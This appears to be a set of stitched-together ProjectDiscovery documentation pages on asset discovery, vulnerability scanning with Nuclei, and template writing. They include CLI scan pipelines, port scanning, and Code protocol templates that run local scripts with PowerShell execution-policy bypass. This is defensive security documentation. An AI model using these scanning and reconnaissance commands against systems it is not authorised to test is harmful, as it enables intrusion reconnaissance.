Think of it as a security-focused CI pipeline – continuously monitoring, automatically triggering, and instantly protecting your infrastructure against emerging threats.
## Setup and Configuration Options
### Setting Up Real-Time Scans
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/image.png)
All Enterprise accounts are automatically enrolled in Real-time Autoscan. To check if Real-time Autoscan is enabled for your account:
1. Visit the [ProjectDiscovery Cloud Dashboard](https://cloud.projectdiscovery.io/)
2. Navigate to the Real-Time Scanning section directly from the dashboard home
3. Check if "Real-time Autoscan" is toggled on
### Custom Asset Selection
![Real-time scanning configuration options](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/images/real-time-scans-config.png)
By default, every asset added to ProjectDiscovery will be automatically scanned when new Nuclei templates are released.
Real-time Autoscan can also be configured to scan a subset of your assets by taking the following steps:
1. Visit the [ProjectDiscovery Cloud Dashboard](https://cloud.projectdiscovery.io/)
2. Navigate to the Real-Time Scanning section directly from the dashboard home
3. Click on the gear icon next to the toggle
4. Select **Custom Assets**
5. Select the asset groups you wish to include in Real-time Autoscan
6. Click on **Update**
## Reviewing Scan Results
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/Screenshot2025-01-09at3.31.10PM.png)
Real-time Autoscan results are grouped as a separate scan titled **"Early Templates Autoscan"** under the **Scans** tab. This scan updates automatically whenever a new Nuclei template is merged, scanning your assets with the latest template.
Detected vulnerabilities will appear as open results within the scan. These results will remain open even if the scan is later updated with a newly merged Nuclei template.
To view the most recent template used in the scan:
1. Click the three dots menu to the right of the scan.
2. Select **Update**
3. Click on the tab **Set templates**.
4. Expand the folder labeled **"Early Templates"**.
## Alerting
![](https://mintlify.s3.us-west-1.amazonaws.com/projectdiscovery/Screenshot2025-01-09at3.57.03PM.png)
By default, only newly detected vulnerabilities generate an email or message alert. However, on occasion, we may merge a trending exploit that warrants a notification even if no vulnerable hosts are detected. This message can be shared internally to proactively communicate a strong security posture to relevant stakeholders and leadership.
Real-time scanning is a feature available with our Enterprise plan.
# Retesting Vulnerabilities
Source: https://docs.projectdiscovery.io/cloud/scanning/retesting
Quickly verify the current status of vulnerabilities through targeted retesting
Retesting allows you to quickly verify the current status of a vulnerability, confirming whether it has been remediated or remains active. This feature is designed for ad-hoc validation of findings, eliminating the need to run full scans repeatedly.
When you initiate a retest, you'll be presented with a confirmation dialog.
The retest scan will automatically verify if the vulnerability has been resolved. If fixed, the report status will automatically update to "Fixed". Otherwise, it will revert to its original status.
## Supported Scenarios
### External Vulnerabilities
* Direct retesting of vulnerabilities on externally accessible assets
* No additional configuration required
* Immediate validation of remediation status
### Internal Vulnerabilities
The platform supports retesting of internal vulnerabilities in two scenarios:
1. **Cloud Platform Internal Scans**
* Results from scans executed through the cloud platform
* Requires selection of an internal proxy for retesting
* Maintains consistent access to internal targets
2. **Uploaded Local Scan Results**
* Support for results from locally executed scans
* Requires proxy host with access to the original internal targets
* Seamless integration with existing internal scanning workflows
To set up internal scanning capabilities and configure proxies, refer to our [Internal Network Scanning](/cloud/scanning/internal-scan) guide. This covers both TunnelX setup for cloud-managed scanning and local scanning configurations.
For internal vulnerabilities, you'll need a properly configured proxy. You can either:
* Use TunnelX for cloud-managed scanning (recommended for Enterprise users)
* Set up local scanning with result uploads
Learn more in our [Internal Scanning guide](/cloud/scanning/internal-scan).
# Getting Help
Source: https://docs.projectdiscovery.io/help/home
Review your options for getting help from ProjectDiscovery
Need assistance or guidance? You're in the right place, and we're here to help!
# ProjectDiscovery Documentation
Source: https://docs.projectdiscovery.io/home
Security at Scale: Tap into the Future of Security Workflows. Learn and read all about our open-source technologies, cloud platform, and APIs.

* Map your internet-exposed assets and understand your attack surface.
* Create and automate custom security templates to detect vulnerabilities at scale.
* Stay updated with trending vulnerabilities and security exploits in real-time.

**For Organizations**

* Scale your security operations with our cloud platform and advanced automation.
* Connect and monitor AWS, GCP, Cloudflare, and Azure accounts for security vulnerabilities.
* Integrate with your existing ticketing and alerting tools.
* Build and automate custom security workflows using our comprehensive REST APIs.
* Secure internal networks with automated vulnerability assessment and monitoring.
* Configure SAML SSO, IP whitelisting, custom headers, and more for your organization.

Get personalized guidance on implementing security workflows for your organization. Our team is ready to help you scale your security operations.
# ProjectDiscovery Quick Start Guide
Source: https://docs.projectdiscovery.io/quickstart/index
Get started with ProjectDiscovery for asset discovery, vulnerability scanning, and exposure monitoring
ProjectDiscovery helps security and engineering teams continuously monitor and secure what they deploy on the internet. Modern development moves fast, and it's easy to unknowingly expose assets—whether it's an open port (e.g., 9092) assumed to be internal or a cloud resource left publicly accessible. Our platform automates discovery, providing real-time visibility into your internet-facing infrastructure, so you know exactly what's exposed before attackers do.
Beyond discovery, ProjectDiscovery actively identifies and verifies exploitable vulnerabilities across your attack surface. Using real-world attack techniques, we simulate how adversaries find and exploit security gaps—but in a controlled, safe manner. This eliminates false positives and helps teams focus on actual risks. The platform is fully customizable, allowing you to extend detection with your own security rules, tailored to findings from pen tests, bug bounties, or internal policies.
Backed by battle-tested open-source security tools used by over 100,000 professionals, ProjectDiscovery combines real-world attack detection with comprehensive vulnerability management. While traditional tools rely on CVE databases and version checks, we take an attacker's perspective—helping organizations understand, prioritize, and secure their most critical exposures in real time.
## Real-World Impact of Security Exposures
Recent high-profile breaches demonstrate why continuous security monitoring is crucial:
* **Capital One (2019)**: Attackers exploited a misconfigured web application firewall and SSRF vulnerability to access an exposed AWS S3 bucket, stealing sensitive customer data.
* **Uber (2016/2017)**: Hackers discovered cloud access credentials accidentally committed in a GitHub repository, using them to access AWS and extract millions of user and driver records.
* **Equifax (2017)**: An unpatched Apache Struts vulnerability (CVE-2017-5638) in a public-facing web application allowed remote code execution, compromising personal data of around 143 million people.
* **Colonial Pipeline (2021)**: A legacy VPN account without multi-factor authentication was exploited using stolen credentials, granting attackers access to the network and triggering a ransomware attack.
* **Panera Bread (2018)**: An unsecured API endpoint exposed customer data in plain text, enabling attackers to enumerate records via sequential IDs and scrape millions of user profiles.
These incidents highlight why organizations need robust security monitoring and vulnerability management. ProjectDiscovery's platform helps prevent such breaches by continuously monitoring your attack surface and validating security controls.
## Platform Overview
**ProjectDiscovery** is a security platform that combines powerful **open-source tools** with a **cloud-based service** to help you secure your infrastructure. It offers a hybrid approach where you can use a user-friendly cloud interface or command-line tools (CLI) – or both – to suit your workflow. With ProjectDiscovery, you can:
* **Discover your assets** – Identify all your external-facing systems, domains, cloud resources, and more
* **Scan for vulnerabilities** – Use automated, up-to-date vulnerability checks to find exploitable issues
* **Monitor exposures continuously** – Keep an eye on your external and internal risks in real-time
* **Automate security tasks** – Integrate with APIs and workflows to alert your team when issues are found
Whether you're a beginner or a seasoned security professional, ProjectDiscovery's Cloud platform and CLI tools work together to provide immediate insights into your attack surface. The following guide will walk you through essential workflows on **both Cloud and CLI**, so you can quickly see value in using ProjectDiscovery for real-world security use cases.
* Get started with our cloud platform for instant asset discovery and continuous monitoring
* Explore our powerful CLI tools for security testing and automation
New to ProjectDiscovery? [Sign up for free](https://cloud.projectdiscovery.io) to start securing your infrastructure.
## Quick Navigation
* Learn how to discover and manage your external attack surface
* Set up automated vulnerability scanning and continuous monitoring
* Create custom security checks using our template framework
* Connect cloud providers and third-party services
## Getting Started with Cloud
ProjectDiscovery Cloud makes it easy to discover and scan assets without managing any infrastructure. Follow these steps to get started quickly:
1. **Sign Up and Log In:** Create a free account on the ProjectDiscovery Cloud platform (go to **cloud.projectdiscovery.io** and sign up). After verifying your email, log in to access the Cloud dashboard.
2. **Add Your Assets:** Once in the dashboard, start your asset discovery by adding a **root domain** or organization name. For example, add **`yourcompany.com`** as a root domain. The platform will automatically enumerate subdomains, IP addresses, and related assets linked to that domain. You can add up to a certain number of domains for free — e.g. your company's main domains. ProjectDiscovery will use its scanners behind the scenes to give you an instant inventory of your external assets.
3. **Initiate a Vulnerability Scan:** After your assets are discovered, launch an automated vulnerability scan in the cloud platform. You can navigate to the **Scans** section, select your asset or asset group, and start a **Nuclei scan** (Nuclei is the engine that runs vulnerability templates). Use the default template set to scan for a wide range of common issues. The scan runs in the cloud, testing your assets for exploitable vulnerabilities (like misconfigurations, outdated software, and known CVEs).
4. **Continuous Monitoring:** ProjectDiscovery Cloud will **continuously monitor** your assets without further input. This means if a new subdomain appears tomorrow or a new critical vulnerability emerges in the template feed, the platform can automatically discover and scan it. You can also schedule regular scans (e.g. daily or weekly) for ongoing coverage. Essentially, once your assets are added, the cloud platform keeps an eye on them and updates findings in real-time.
5. **Review Findings and Alerts:** Check the **Dashboard** or **Reports** section to review the results. You'll see any vulnerabilities found, categorized by severity, with details for each finding. For example, if an exposed admin panel or a known CVE was detected, it will be listed with information on the affected asset. From here, you can prioritize what to fix first. ProjectDiscovery Cloud also lets you set up real-time alerts – for instance, you can configure notifications via Email, Slack, or Microsoft Teams to be alerted the moment a high-severity issue is discovered. This ensures your team is notified immediately about critical risks.
**Key Cloud Features:** *Instant asset discovery, automated scanning, and continuous monitoring* are built-in. As soon as you add a domain, the platform gives you quick visibility into your tech stack (domains, cloud instances, etc.). It continuously scans for **exploitable vulnerabilities** using the latest community-driven templates, so you're always up-to-date on emerging threats. All of this happens with no infrastructure for you to manage – the Cloud platform handles the heavy lifting while you get actionable results.
## Getting Started with CLI
If you prefer working in a terminal or want to integrate scans into your own environment, ProjectDiscovery's CLI tools are for you. This section will help you install the essential tools and run basic scans for asset discovery and security testing.
**1. Install the CLI Tools:** ProjectDiscovery's open-source tools are written in Go, so you'll need to have Go (v1.20+ recommended) installed on your system. There are two convenient ways to install the tools:
* *Use the Tool Manager (PDTM):* The **ProjectDiscovery Tool Manager (PDTM)** is a utility to install and update all tools easily. If you have Go, you can install PDTM by running:
```bash
go install -v github.com/projectdiscovery/pdtm/cmd/pdtm@latest
```
After installation, run `pdtm -ia` (install all) to automatically download and set up all ProjectDiscovery CLI tools. This one command gives you access to **Nuclei**, **Subfinder**, **HTTPx**, and many more tools in one go.
* *Install Individually:* Alternatively, you can install tools individually. For example:
```bash
go install -v github.com/projectdiscovery/subfinder/cmd/subfinder@latest
go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```
This will fetch the latest Subfinder, HTTPx, and Nuclei binaries into your `$GOPATH/bin`. (You can also find pre-built binaries on the ProjectDiscovery GitHub or use package managers like Homebrew on macOS.)
*Note:* Ensure your Go `bin` path is in your `PATH` environment variable so you can run the tools from any directory. Once installed, you can verify by running `subfinder -h`, `httpx -h`, and `nuclei -h` to see the help output.
**2. Asset Discovery with Subfinder:** To immediately see value from the CLI, start by discovering assets. For example, to find subdomains of a target domain:
```bash
subfinder -d example.com -o subdomains.txt
```
This command uses passive sources to enumerate subdomains of **example.com** and saves the results to `subdomains.txt`. In seconds, you'll get a list of domains that are part of the target's attack surface. (You can also run `subfinder -d example.com` without the `-o` flag to just print results to the screen.)
**3. Probing Assets with HTTPx:** Often, you'll want to know which of those discovered domains are alive and what web technologies they are running. **HTTPx** can take a list of hostnames and probe them for active web services:
```bash
httpx -l subdomains.txt -o live_hosts.txt -title -status-code -silent
```
Here, the `-title` and `-status-code` flags tell HTTPx to fetch the page title and HTTP status code for each host, and `-silent` removes verbose headers for clean output. The results saved in `live_hosts.txt` will show you which subdomains are up, and give a hint of what each is (for example, a status 200 and a title "Login Portal" might indicate a login page). This helps you focus on active targets.
**4. Vulnerability Scanning with Nuclei:** Now for the real value – finding vulnerabilities. **Nuclei** is a fast vulnerability scanner that uses template files to check targets for hundreds of known issues. You can run Nuclei against a single URL or a list:
```bash
nuclei -l live_hosts.txt -o findings.txt
```
This will scan all the hosts in `live_hosts.txt` for a broad range of vulnerabilities. Nuclei will output any findings to the console and also save them to `findings.txt`. Each finding will include the URL, the name of the vulnerability detected (based on the template that matched), and a severity level. For a quick test, you could also run nuclei directly on a single URL, e.g., `nuclei -u https://example.com`, to see if any common issues are present.
After running these tools, you should have: a list of your assets (subdomains), a list of active systems, and any potential vulnerabilities discovered. Even as a beginner, within a few minutes you've used the CLI to map out a target and identify possible security issues – demonstrating the immediate value of ProjectDiscovery's tools.
*(Tip: All ProjectDiscovery tools come with various options. For instance, you can update Nuclei templates with `nuclei -update-templates`, or limit scan scope by severity. As you grow more comfortable, you can customize these tools for more targeted results.)*
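To tie these steps together, the individual tools can also be chained in a single pipeline. Here is a minimal sketch, where the domain, severity filter, and output file are placeholders you would adapt:
```bash
# Enumerate subdomains, probe for live web services, and scan them in one pass
subfinder -d example.com -silent | httpx -silent | nuclei -severity critical,high -o pipeline_findings.txt
```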
## Key Workflows & Use Cases
Automatically discover and track assets across your infrastructure
Continuously scan for and detect security vulnerabilities
Monitor and manage security exposures in real-time
Secure cloud and on-premise infrastructure
### Asset Discovery
The first step in securing your attack surface is knowing what assets you have. ProjectDiscovery simplifies **asset discovery** by automatically finding and inventorying assets across your domains and cloud environments. In the Cloud platform, you can start with a few **root domains**, and the system will continuously discover all subdomains, related hosts, and even cloud infrastructure tied to those domains. This gives you an up-to-date inventory of external-facing assets (websites, APIs, servers, etc.) without manual effort. On the CLI side, tools like Subfinder (for subdomains) and Cloudlist (for cloud resources) let you script out asset discovery as well. By quickly building a comprehensive asset list, you ensure that no part of your external infrastructure is overlooked.
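As a rough CLI sketch of this workflow (the domain is a placeholder, and Cloudlist assumes provider credentials are already configured in its config file):
```bash
# Subdomain discovery for a root domain
subfinder -d example.com -silent -o domains.txt

# Cloud asset discovery across the configured providers
cloudlist -silent > cloud_assets.txt
```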
### Real-time Vulnerability Scanning
Once you have an asset inventory, the next workflow is to find **exploitable vulnerabilities** on those assets – ideally before attackers do. ProjectDiscovery's approach focuses on *real-time, template-driven scanning*. The Cloud platform continuously runs vulnerability scans using the latest **Nuclei templates** contributed by the community and ProjectDiscovery researchers, so it can catch newly disclosed issues fast. You can perform on-demand scans (for example, after a new deployment) or schedule regular scans across all assets. In practice, this means if a critical vulnerability (say, a new RCE in a popular software) is added to the templates, ProjectDiscovery can detect it on your systems within minutes of its disclosure. Using the CLI, you can integrate Nuclei into your CI/CD or scripts to scan specific targets (for instance, scanning every new build of an application before release). The result is a proactive vulnerability management process – you're finding and fixing weaknesses *in real time*, rather than reacting after an incident.
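For example, a CI/CD step might run a scoped scan against a freshly deployed staging host and fail the build on serious findings; the URL and severity filter below are illustrative:
```bash
# Scan the new deployment, limiting checks to high/critical severity
nuclei -u https://staging.example.com -severity critical,high -o ci_findings.txt

# Fail the pipeline if any findings were written
test ! -s ci_findings.txt
```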
### Exposure Management
Security isn't a one-time effort. **Exposure management** is about continuously monitoring for changes or new risks in your environment, both external and internal, and responding quickly. ProjectDiscovery Cloud excels here by offering continuous monitoring of your attack surface. Once you've added your assets, it will keep checking for things like new subdomains popping up, services changing, or new vulnerabilities arising. If an exposure is found – for example, an open database becomes visible or an internal server starts exposing a port – the platform can send you immediate alerts. You can configure real-time notifications via your preferred channels (Email, Slack, Microsoft Teams, or custom webhooks) for various events. This real-time awareness is crucial for catching misconfigurations or shadow IT (unknown assets) before they become major incidents. Additionally, ProjectDiscovery supports internal exposure monitoring: you can run internal network scans (using Nuclei or Naabu for ports) and feed the results into the platform to ensure even behind-the-firewall assets are tracked. In short, exposure management with ProjectDiscovery means you always have an eye on your security posture and can react to new threats or changes as they happen.
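A simple internal sweep from the CLI could look like the following sketch (the network range and port selection are placeholders); the results can then be reviewed or uploaded to the platform:
```bash
# Find open ports on an internal range, then check the exposed services with Nuclei
naabu -host 10.0.0.0/24 -top-ports 100 -silent -o open_ports.txt
nuclei -l open_ports.txt -o internal_findings.txt
```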
### Infrastructure Security
Modern organizations run on complex infrastructure – multiple cloud providers, containers, on-prem networks, etc. ProjectDiscovery helps with **infrastructure security** by scanning your cloud and network environments for misconfigurations and risks. Through its integrations (and tools like Cloudlist), ProjectDiscovery Cloud can enumerate assets from **AWS, GCP, Azure, and others**, identifying things like misconfigured S3 buckets, public-facing VMs, or open network ports. For example, you can connect your AWS account and automatically retrieve a list of IPs, hostnames, and services you have, then have Nuclei scan them for known cloud-specific vulnerabilities. The platform's built-in port scanner (powered by Naabu) can check all your asset IPs for open ports (1-65535) to uncover services you might not realize are exposed. On the CLI side, you can similarly use Naabu for port scanning and feed those results into Nuclei or other tools for deeper analysis. Importantly, ProjectDiscovery also supports scanning internal infrastructure by letting you run scans within your network and upload the results to the cloud platform. This means even if certain systems aren't reachable from the outside, you can still include them in your security assessment. **Infrastructure security** use cases include checking your cloud accounts for open admin ports, ensuring no dev database is inadvertently open to the internet, and verifying that all your critical services are configured securely. ProjectDiscovery provides the tools to automate these checks across your entire tech stack.
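As a hedged sketch of that CLI workflow (Cloudlist assumes cloud credentials are configured, and the `exposure` tag is just one example filter):
```bash
# Enumerate cloud-hosted assets, port scan them, and check the exposed services
cloudlist -silent | naabu -silent | nuclei -tags exposure -o cloud_findings.txt
```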
## Automation & Integration
Integrate ProjectDiscovery into your workflows using our REST APIs
Connect with ticketing, alerting, and cloud services
## Additional Resources
Join our active community for support and discussions
Explore our open-source tools and contribute
Read about security research and tool updates
## Next Steps & Resources
You've just scratched the surface of what ProjectDiscovery can do. Here are some next steps and resources to continue your journey:
* **Official Documentation:**
* Explore the comprehensive docs at **[docs.projectdiscovery.io](https://docs.projectdiscovery.io)**
* [Cloud Platform Overview](/cloud/introduction)
* [Asset Discovery Guide](/cloud/assets/overview)
* [Vulnerability Scanning Guide](/cloud/scanning/overview)
* [API Documentation](/api-reference/introduction)
* **Community Support:**
* Join the [ProjectDiscovery Discord](https://discord.gg/projectdiscovery) for real-time discussions
* Visit our [GitHub Discussions](https://github.com/projectdiscovery/nuclei/discussions) for technical questions
* Follow us on [Twitter](https://twitter.com/pdiscoveryio) for updates
* Report issues on [GitHub](https://github.com/projectdiscovery)
* **Tutorials & Examples:**
* Watch our ["All ProjectDiscovery Tools in 30 Minutes"](https://www.youtube.com/watch?v=cBkfk0VbvLw) video
* Learn about [Template Creation](/templates/introduction)
* Explore [Cloud Integrations](/cloud/integrations)
* Read our [Technical Blog](https://blog.projectdiscovery.io)
* Check [Template Examples](/templates/structure)
* **Nuclei Templates & Open Source:**
* Browse the [Nuclei Templates Repository](https://github.com/projectdiscovery/nuclei-templates)
* Learn about [Contributing Templates](/templates/introduction#contributing)
* Use the [Template Editor](https://cloud.projectdiscovery.io/templates/editor)
* Explore [Template Syntax](/templates/protocols/http/basic-http)
* **Integration Guides:**
* Set up [Cloud Provider Integrations](/cloud/integrations#cloud-asset-discovery)
* Configure [Notification Systems](/cloud/integrations#notification-integrations)
* Implement [Ticketing Integration](/cloud/integrations#ticketing-integrations)
* Use [Custom Webhooks](/cloud/integrations#webhook)
* Learn about [API Integration](/api-reference/introduction)
By following this quick start guide, you've taken the first steps in proactive security monitoring. With ProjectDiscovery's cloud platform and CLI tools at your disposal, you have a scalable way to discover what you have, know when it's vulnerable, and respond faster. Keep experimenting with the tools, leverage the community's knowledge, and soon you'll be using ProjectDiscovery to its full potential in defending your organization's attack surface. Happy scanning!
# Nuclei Templates FAQ
Source: https://docs.projectdiscovery.io/templates/faq
Common questions and answers about Nuclei templates, including usage tips and best practices.
For info on the Nuclei Template Editor or using templates on our cloud platform - [learn more here](/cloud/editor/overview).
Nuclei [templates](http://github.com/projectdiscovery/nuclei-templates) are the core of the Nuclei project. The templates contain the actual logic that is executed in order to detect various vulnerabilities. The project consists of **several thousand** ready-to-use **[community-contributed](https://github.com/projectdiscovery/nuclei-templates/graphs/contributors)** vulnerability templates.
We maintain a [template guide](/templates/introduction/) for writing new and custom Nuclei templates.
Performing security assessment of an application is time-consuming. It's always better and time-saving to automate steps whenever possible. Once you've found a security vulnerability, you can prepare a Nuclei template by defining the required HTTP request to reproduce the issue, and test the same vulnerability across multiple hosts with ease. It's worth mentioning ==you write the template once and use it forever==, as you don't need to manually test that specific vulnerability any longer.
Here are few examples from the community making use of templates to automate the security findings:
* [https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/](https://dhiyaneshgeek.github.io/web/security/2021/02/19/exploiting-out-of-band-xxe/)
* [https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning](https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning)
* [https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites](https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites)
* [https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state](https://blog.melbadry9.xyz/dangling-dns/aws/ddns-ec2-current-state)
* [https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out](https://projectdiscovery.io/blog/if-youre-not-writing-custom-nuclei-templates-youre-missing-out)
Nuclei templates can be executed using a template name or with tags, using `-templates` (`-t`) and `-tags` flag, respectively.
```bash
nuclei -tags cve -list target_urls.txt
```
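Similarly, specific templates or template directories can be run by path with the `-t` flag (the path below is illustrative):
```bash
nuclei -t cves/ -list target_urls.txt
```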
You are always welcome to share your templates with the community. You can either open a [GitHub issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=nuclei-template\&template=submit-template.md\&title=%5Bnuclei-template%5D+template-name) with the template details or open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with your nuclei templates. If you don't have a GitHub account, you can also make use of the [discord server](https://discord.gg/projectdiscovery) to share the template with us.
The Nuclei template project is a **community-contributed project**. The ProjectDiscovery team manually reviews templates before merging them into the project. Still, there is a possibility that some templates with weak matchers will slip through the verification. This could produce false-positive results. **Templates are only as good as their matchers.**
If you identified templates producing false positive/negative results, here are few steps that you can follow to fix them quickly.
Direct message us on [Twitter](https://twitter.com/pdnuclei) or [Discord](https://discord.gg/projectdiscovery) to confirm the validity of the template.
Please open a GitHub [issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=\&labels=false-positive\&template=false-positive.md\&title=%5Bfalse-positive%5D+template-name+) with details, and we will work to address the problem and update the template.
Please open a GitHub [pull request](https://github.com/projectdiscovery/nuclei-templates/pulls) with fix.
The Nuclei templates project houses a variety of templates that perform fuzzing and other actions which may result in a DoS against the target system (see [the list here](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore)). To ensure these templates are not accidentally run, they are tagged and excluded from the default scan. These templates can only be executed when explicitly invoked using the `-itags` option.
{" "}
When you download or update Nuclei templates using the Nuclei binary, it downloads all the templates from the latest **release**. All templates added after the release exist in the [master branch](https://github.com/projectdiscovery/nuclei-templates) and are added to Nuclei when a new template release is created.
# Introduction to Nuclei Templates
Source: https://docs.projectdiscovery.io/templates/introduction
YAML based universal language for describing exploitable vulnerabilities
Write and test Nuclei templates directly in your browser using our [template editor](https://cloud.projectdiscovery.io/templates/editor). The editor supports AI-assisted template generation, real-time validation, and immediate scanning against your targets. Need automation? Check out our [template generation API](/api-reference/templates/generate-ai-template).
## What are Nuclei Templates?
Nuclei templates are the cornerstone of the Nuclei scanning engine. Nuclei templates enable precise and rapid scanning across various protocols like TCP, DNS, HTTP, and more. They are designed to send targeted requests based on specific vulnerability checks, ensuring low-to-zero false positives and efficient scanning over large networks.
## YAML
Nuclei templates are `YAML`-based files that define how requests will be sent and processed, which makes Nuclei easy to extend. `YAML` provides a simple, human-readable format for quickly defining the execution process.
## Universal Language for Vulnerabilities
Nuclei Templates offer a streamlined way to identify and communicate vulnerabilities, combining essential details like severity ratings and detection methods. This open-source, community-developed tool accelerates threat response and is widely recognized in the cybersecurity world.
Learn more about nuclei templates as a universal language for exploitable vulnerabilities [on our blog](https://projectdiscovery.io/blog/the-power-of-nuclei-templates-a-universal-language-of-vulnerabilities/).
## Learn more
Let's dive into the world of Nuclei templates! Use the links on the left or those below to learn more.
Learn what makes up the structure of a nuclei template
Get started making simple HTTP requests with Nuclei
Watch a video on writing your first nuclei template!
Nuclei thrives on community contributions. Submit your templates to be used by security experts everywhere!
# Code Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/code
Learn about using external code with Nuclei
Nuclei enables the execution of external code on the host operating system. This feature allows security researchers, pentesters, and developers to extend the capabilities of Nuclei and perform complex actions beyond the scope of regular supported protocol-based testing.
By leveraging this capability, Nuclei can interact with the underlying operating system and execute custom scripts or commands, opening up a wide range of possibilities. It enables users to perform tasks such as system-level configurations, file operations, network interactions, and more. This level of control and flexibility empowers users to tailor their security testing workflows according to their specific requirements.
To write a code template, a `code` block is used to indicate the start of the requests for the template. This block marks the beginning of the code-related instructions.
```yaml
# Start the requests for the template right here
code:
```
## Engine
To execute the code, a list of language interpreters, which are installed or available in the system environment, is specified. These interpreters can include, but are not limited to, `bash`, `sh`, `py`, `python3`, `go`, and `ps`, among others; they are searched sequentially until a suitable one is found. The identifiers for these interpreters should correspond to their respective names or identifiers recognized by the system environment.
```yaml
- engine:
- py
- python3
```
The code to be executed can be provided either as an external file or as a code snippet directly within the template.
For an external file:
```yaml
source: helpers/code/pyfile.py
```
For a code snippet:
```yaml
source: |
import sys
print("hello from " + sys.stdin.read())
```
The target is passed to the template via stdin, and the output of the executed code is available for further processing in matchers and extractors. In the case of the Code protocol, the response part represents all data printed to stdout during the execution of the code.
## Parts
Valid `part` values supported by **Code** protocol for Matchers / Extractor are -
| Value | Description |
| -------- | ---------------------------------------------------- |
| response | execution output (trailing whitespaces are filtered) |
| stderr   | Raw stderr output (if any)                           |
The provided example demonstrates the execution of a bash and a python code snippet within the template. The specified engines are searched in the given order, and the code snippet is executed accordingly. Additionally, dynamic template variables are used in the code snippet and are replaced with their respective values during execution, which shows the flexibility and customization that can be achieved using this protocol.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
variables:
OAST: "{{interactsh-url}}"
code:
- engine:
- sh
- bash
source: |
echo "$OAST" | base64
- engine:
- py
- python3
source: |
import base64
import os
text = os.getenv('OAST')
text_bytes = text.encode('utf-8')
base64_bytes = base64.b64encode(text_bytes)
base64_text = base64_bytes.decode('utf-8')
print(base64_text)
http:
- method: GET
path:
- "{{BaseURL}}/?x={{code_1_response}}"
- "{{BaseURL}}/?x={{code_2_response}}"
# digest: 4a0a0047304502202ce8fe9f5992782da6ba59da4e8ebfde9f19a12e247adc507040e9f1f1124b4e022100cf0bc7a44a557a6655f79a2b4789e103f5099f0f81a8d1bc4ad8aabe7829b1c5:8eeeebe39b11b16384b45bc7e9163000
```
Apart from the required fields mentioned above, the Code protocol also supports the following optional fields to further customize the execution of code.
## Args
Args are arguments passed to the engine while executing the code. For example, to bypass the execution policy in PowerShell for a specific template, add the following args to the template.
```yaml
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
```
## Pattern
The pattern field can be used to customize the name/extension of the temporary file used while executing a code snippet in a template.
```yaml
pattern: "*.ps1"
```
Adding `pattern: "*.ps1"` ensures that the name of the temporary file matches the given pattern (here, a `.ps1` extension).
## Examples
This code example shows a basic response based on DSL.
```yaml
id: code-template
info:
name: example code template
author: pdteam
severity: info
self-contained: true
code:
- engine:
- py
- python3
source: |
print("Hello World")
extractors:
- type: dsl
dsl:
- response
# digest: 4a0a0047304502204576db451ff35ea9a13c107b07a6d74f99fd9a78f5c2316cc3dece411e7d5a2b022100a36db96f2a56492147ca3e7de3c4d36b8e1361076a70924061790003958c4ef3:c40a3a04977cdbf9dca31c1002ea8279
```
Below is an example code template that executes a PowerShell script while customizing the execution policy behaviour and setting the pattern to `*.ps1`.
```yaml
id: ps1-code-snippet
info:
name: ps1-code-snippet
author: pdteam
severity: info
description: |
ps1-code-snippet
tags: code
code:
- engine:
- powershell
- powershell.exe
args:
- -ExecutionPolicy
- Bypass
- -File
pattern: "*.ps1"
source: |
$stdin = [Console]::In
$line = $stdin.ReadLine()
Write-Host "hello from $line"
matchers:
- type: word
words:
- "hello from input"
# digest: 4a0a00473045022100eb01da6b97893e7868c584f330a0cd52df9bddac005860bb8595ba5b8aed58c9022050043feac68d69045cf320cba9298a2eb2e792ea4720d045d01e803de1943e7d:4a3eb6b4988d95847d4203be25ed1d46
```
## Running Code Templates
By default, Nuclei will not execute code templates. To enable code protocol execution, the `-code` flag needs to be explicitly passed to nuclei.
```bash
nuclei -t code-template.yaml -code
```
## Learn More
For more examples, please refer to example [code-templates](https://github.com/projectdiscovery/nuclei/tree/main/integration_tests/protocols/code) in integration tests.
It's important to exercise caution while utilizing this feature, as executing external code on the host operating system carries inherent risks. It is crucial to ensure that the executed code is secure, thoroughly tested, and does not pose any unintended consequences or security risks to the target system.
To ensure the integrity of the code in your templates, be sure to sign your templates using the [Template Signing](/templates/reference/template-signing) methods.
# DNS Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/dns
Learn about using DNS with Nuclei
The DNS protocol can be modelled in Nuclei with ease. Fully customizable DNS requests can be sent by Nuclei to nameservers, and matching/extracting can be performed on their responses.
DNS Requests start with a **dns** block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
dns:
```
### Type
First thing in the request is **type**. Request type can be **A**, **NS**, **CNAME**, **SOA**, **PTR**, **MX**, **TXT**, **AAAA**.
```yaml
# type is the type for the dns request
type: A
```
### Name
The next part of the request is the DNS **name** to resolve. Dynamic variables can be placed in the name to modify its value at runtime. Variables start with `{{` and end with `}}` and are case-sensitive.
1. **FQDN** - variable is replaced by the hostname/FQDN of the target on runtime.
An example name value:
```yaml
name: {{FQDN}}.com
# This value will be replaced on execution with the FQDN.
# If FQDN is https://this.is.an.example then the
# name will get replaced to the following: this.is.an.example.com
```
As of now the tool supports only one name per request.
### Class
Class type can be **INET**, **CSNET**, **CHAOS**, **HESIOD**, **NONE** and **ANY**. Usually it's enough to just leave it as **INET**.
```yaml
# class is the class for the dns request
class: inet
```
### Recursion
Recursion is a boolean value, and determines if the resolver should only return cached results, or traverse the whole dns root tree to retrieve fresh results. Generally it's better to leave it as **true**.
